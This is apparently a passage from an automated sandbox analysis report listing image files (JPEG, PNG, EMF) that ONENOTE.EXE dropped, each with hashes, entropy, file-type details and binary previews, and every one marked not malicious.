                                                                                                        SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 262x277, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3555
                                                                                                        Entropy (8bit):7.686253071499049
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/h3JeYCQV5Hn++9HBdAjU78S/mjLLwqnqahJD:53Je8b+EBdAjm8S/mjLLRnphJD
                                                                                                        MD5:8A5444524F467A45A5A10245F89C855A
                                                                                                        SHA1:ACE68D567B02B68275E0345C86DB1139C0EC1386
                                                                                                        SHA-256:7D2B01F17354D9237A6AB99D5B9AFDF0E1CC43687125848B0C2DEDFB44CE3843
                                                                                                        SHA-512:8151B447B60D110C32EC1EF286B941FFC09B99140F41BBACF5A1650A385FF4D13C0DDB2878E9A470FC7CFCC95A1AB6E44F6DE72562B0FFE093DC8A3C3C7FCC14
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):41893
                                                                                                        Entropy (8bit):7.52654558351485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                        MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                        SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                        SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                        SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4819
                                                                                                        Entropy (8bit):7.874649683222419
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                        MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                        SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                        SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                        SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):36740
                                                                                                        Entropy (8bit):7.48266872907324
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                        MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                        SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                        SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                        SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25622
                                                                                                        Entropy (8bit):7.058784902089801
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                        MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                        SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                        SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                        SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59832
                                                                                                        Entropy (8bit):7.308211468398169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                        MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                        SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                        SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                        SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                        Malicious:false
